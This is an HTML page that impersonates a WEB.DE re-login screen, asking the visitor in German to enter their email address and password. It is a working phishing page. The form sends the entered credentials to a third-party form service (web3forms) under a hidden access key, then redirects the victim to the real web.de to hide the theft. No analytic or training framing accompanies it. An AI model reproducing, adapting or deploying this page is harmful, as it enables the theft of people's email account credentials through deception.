<!DOCTYPE html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WEB.DE</title>
    <style>
        body {
            font-family: sans-serif;
            background: #f3f3f3;
        }
        
        main {
            display: flex;
            justify-content: center;
        }
        
        .form-group {
            margin-bottom: 5%;
            border-radius: 5px;
        }
        
        .img {
            display: flex;
            padding-left: 2%;
            padding-top: 1%;
            justify-content: left;
            background-color: white;
            border-top: 4px solid #ffd800;
            padding: 8px;
            outline: none;
            border-bottom-color: rgb(53, 52, 52);
            border-bottom: 1px solid rgb(53, 52, 52);
        }
        
        div {
            text-align: center;
        }
        
        form {
            margin: 2em 10%;
            width: 80%;
        }
        
        input[type="text"],
        select,
        textarea {
            width: 100%;
            padding: 0.5em;
        }
    </style>

</head>

<body>
    <header>
        <div class="img">
            <img src="image/dp.png" alt="Not supported" width="10%" height="auto">
            <div class="search">
            </div>
        </div>

        <div>
            <img src="image/download.png" width="15%" style="padding-top: 5%;">
        </div>

        <div>
            <h1>Bitte erneut einloggen</h1>
        </div>

        <div>
            <p>Bitte melden Sie sich mit Ihrem WEB.DE <br> Nutzernamen und Ihrem Passwort an.</p>
        </div>
    </header>

    <main>
        <form action="https://api.web3forms.com/submit" method="POST">

            <input type="hidden" name="access_key" value="b2c1dcc9-5d72-4527-9fdc-dea56bd181cb">

            <input type="hidden" name="redirect" value="https://web.de">

            <div class="form-group">
                <input type="text" name="text" placeholder="WEB.DE E-mail Addresse" maxlength="50" required>
            </div>

            <div class="form-group">
                <input type="text" name="text" placeholder="Passwort eingeben" required>
            </div>

            <div class="form-group">
                <input type="submit" value="Login" style="background-color:#ffd800; border-radius: 3px; border-width:0; width:30%; height:30px">
            </div>
        </form>
    </main>

    <section style="text-align: center; font-family: sans-serif; color:#2c2a2a">
        <h3>Neu bei WEB.DE?</h3>
    </section>
</body>

</html>